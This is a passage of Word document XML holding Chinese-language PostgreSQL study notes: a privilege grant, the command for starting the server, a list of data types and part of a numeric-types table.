        <w:t>postgres=# GRANT ALL PRIVILEGES ON DATABASE testdb TO db_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6BF73" w14:textId="77777777" w:rsidR="00EE457B" w:rsidRPr="00EE457B" w:rsidRDefault="00EE457B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B86F21" w14:textId="77777777" w:rsidR="00EE457B" w:rsidRDefault="00EE457B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B93D8DD" w14:textId="23233550" w:rsidR="00A23AE1" w:rsidRDefault="00A23AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc159779562"/>
      <w:r>
        <w:t>启动数据库服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="154FCDCB" w14:textId="67B51B72" w:rsidR="004775A8" w:rsidRDefault="00A23AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A23AE1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>postgres -</w:t>
      </w:r>
      <w:r w:rsidR="00FB2DCC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23AE1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/usr/local/pgsql/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7957B481" w14:textId="7963CA51" w:rsidR="004775A8" w:rsidRDefault="003B108A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>也可以，会读取环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>GDATA</w:t>
      </w:r>
      <w:r>
        <w:t>命名的目录，否则会失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04556BB5" w14:textId="5C11AFFB" w:rsidR="003B108A" w:rsidRDefault="003B108A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FF58F8" w14:textId="46EFD0E5" w:rsidR="009817C0" w:rsidRDefault="009817C0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc159779563"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="2774201D" w14:textId="77777777" w:rsidR="009817C0" w:rsidRDefault="009817C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD1CA3C" w14:textId="516DBF22" w:rsidR="00CB2A1B" w:rsidRDefault="00CB2A1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E90F0AC" w14:textId="77777777" w:rsidR="00CB2A1B" w:rsidRDefault="00CB2A1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB4ADB4" w14:textId="21CB193C" w:rsidR="009817C0" w:rsidRDefault="009817C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据类型非常多，参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B0872" w14:textId="066F0237" w:rsidR="009817C0" w:rsidRDefault="009817C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009817C0">
        <w:t>https://www.runoob.com/postgresql/postgresql-data-type.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DAD22" w14:textId="77777777" w:rsidR="009817C0" w:rsidRDefault="009817C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676BDBCA" w14:textId="41B65CFF" w:rsidR="009B2645" w:rsidRDefault="00F14954" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数值类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>货币类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符类型</w:t>
      </w:r>
      <w:r w:rsidR="007E6670">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E6670" w:rsidRPr="007E6670">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日期</w:t>
      </w:r>
      <w:r w:rsidR="007E6670" w:rsidRPr="007E6670">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="007E6670" w:rsidRPr="007E6670">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间类型</w:t>
      </w:r>
      <w:r w:rsidR="006A7777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7777" w:rsidRPr="006A7777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔类型</w:t>
      </w:r>
      <w:r w:rsidR="006A7777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57D30" w:rsidRPr="00B57D30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型</w:t>
      </w:r>
      <w:r w:rsidR="00B57D30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B8550F" w:rsidRPr="00B8550F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几何类型</w:t>
      </w:r>
      <w:r w:rsidR="00E10A5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E10A5B" w:rsidRPr="00E10A5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络地址类型</w:t>
      </w:r>
      <w:r w:rsidR="00DF300F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF300F" w:rsidRPr="00DF300F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位串类型</w:t>
      </w:r>
      <w:r w:rsidR="00DF300F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C9742F" w:rsidRPr="00C9742F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文本搜索类型</w:t>
      </w:r>
      <w:r w:rsidR="00C9742F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004812FA" w:rsidRPr="004812FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID </w:t>
      </w:r>
      <w:r w:rsidR="004812FA" w:rsidRPr="004812FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidR="004812FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D3DC7" w:rsidRPr="002D3DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r w:rsidR="002D3DC7" w:rsidRPr="002D3DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidR="002D3DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00970D66" w:rsidRPr="00970D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON </w:t>
      </w:r>
      <w:r w:rsidR="00970D66" w:rsidRPr="00970D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidR="00970D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F2DF4" w:rsidRPr="009F2DF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组类型</w:t>
      </w:r>
      <w:r w:rsidR="009F2DF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000640AB" w:rsidRPr="000640AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复合类型</w:t>
      </w:r>
      <w:r w:rsidR="00E660DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E660DF" w:rsidRPr="00E660DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围类型</w:t>
      </w:r>
      <w:r w:rsidR="00D45361">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D45361" w:rsidRPr="00D45361">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象标识符类型</w:t>
      </w:r>
      <w:r w:rsidR="00FC624E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC624E" w:rsidRPr="00FC624E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F29C4" w14:textId="72E5EDB8" w:rsidR="00D150D5" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数值类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12528" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2146"/>
        <w:gridCol w:w="1002"/>
        <w:gridCol w:w="2872"/>
        <w:gridCol w:w="6508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="34091D3F" w14:textId="77777777" w:rsidTr="00D4520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6F40E257" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smallint</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27381EF0" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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2F07B66E" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>小范围整数</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55EE5A40" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-32768 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> +32767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="6115B269" w14:textId="77777777" w:rsidTr="00D4520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5CB3C51D" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>integer</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779DD175" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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7C79733B" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>常用的整数</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5A4696D8" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-2147483648 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> +2147483647</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="74442914" w14:textId="77777777" w:rsidTr="00D4520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186A4D19" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bigint</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411C8196" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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7DA43899" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>大范围整数</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201C2F02" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-9223372036854775808 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> +9223372036854775807</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="49575296" w14:textId="77777777" w:rsidTr="00D4520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75E8DDCC" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>decimal</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0191CCEE" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
